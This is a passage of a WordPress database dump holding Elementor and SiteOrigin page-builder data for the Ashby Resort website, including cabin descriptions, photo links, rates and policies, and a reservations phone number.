\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2418,817,'_wp_page_template','default'),(2419,817,'_elementor_edit_mode','builder'),(2420,817,'_elementor_template_type','post'),(2421,817,'_elementor_version','2.5.15'),(2422,817,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>SPECIALS: I STILL HAVE A COUPLE OF WEEKS OPEN IN JUNE. CALL AND BOOK BEFORE THE END OF MAY AND GET $100 OFF A WEEKLY STAY!!!<\\/strong><\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2425,818,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:897:\"<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.<br />\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM<br />\nWe believe that Pets are part of the family so pets on a leash are welcome in all campsites a day and some of the units PETS $8.00 per day<br />\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1544645389395\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2426,818,'_wp_page_template','default'),(2427,818,'_elementor_edit_mode','builder'),(2428,818,'_elementor_template_type','post'),(2429,818,'_elementor_data','[{\"id\":\"74711f2d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9f9cdef\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3281785\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"30a19b3\"}]},\"elements\":[{\"id\":\"5f29bf84\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7f1543f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"66ca0a5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8669d73\"}]},\"elements\":[{\"id\":\"3f6cc34d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pl-43\\\" class=\\\"panel-layout\\\"><div id=\\\"pg-43-0\\\" class=\\\"panel-grid panel-no-style\\\" data-style=\\\"{\\\" data-ratio=\\\"1\\\" data-ratio-direction=\\\"right\\\"><div id=\\\"pgc-43-0-0\\\" class=\\\"panel-grid-cell\\\" data-weight=\\\"1\\\"><div id=\\\"panel-43-0-0-0\\\" class=\\\"so-panel widget widget_sow-editor panel-first-child\\\" data-index=\\\"0\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">Call us at 218-747-2959 for reservations\\u2028<p>A MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.<br \\/>ALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW<\\/p><p>Wireless Internet Available<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"1\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>[table id=1 \\/]<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-2\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p>Suite #9 \\u2013 Cabins #13 &amp; #14 are no smoking and no pets<br \\/>Prices shown are for groups of 4 or less.\\u2028 All Daytime (Not Overnight) Guests $5.00 each \\u2028Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br \\/>All RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\\u2028PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\\u2028 CRIBS &amp; HIGHCHAIRS AVAILABLE.<\\/p><p>CHECK IN TIME IS AFTER 3:00 PM\\u2028 NO EXCEPTIONS\\u2028. CHECK OUT TIME IS BEFORE 10:00 AM<br \\/>We believe that Pets are part of the family so pets on a leash are welcome in all campsites ( 1 pet per campsite)\\u00a0 and some of the units ( 1 pet per unit where allowable). \\u2028PETS $8.00 per day<br \\/>Please do not bring firewood, if you live more than 50 miles from Ashby!<br \\/>MOTEL OPEN YEAR ROUND.\\u2028 CALL FOR WINTER RATES<\\/p><\\/div><\\/div><\\/div><div id=\\\"panel-43-0-0-3\\\" class=\\\"so-panel widget widget_sow-editor panel-last-child\\\" data-index=\\\"3\\\" data-style=\\\"{\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\">[table id=2 \\/]<\\/div><\\/div><\\/div><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2430,818,'_elementor_version','2.5.12'),(2433,819,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet 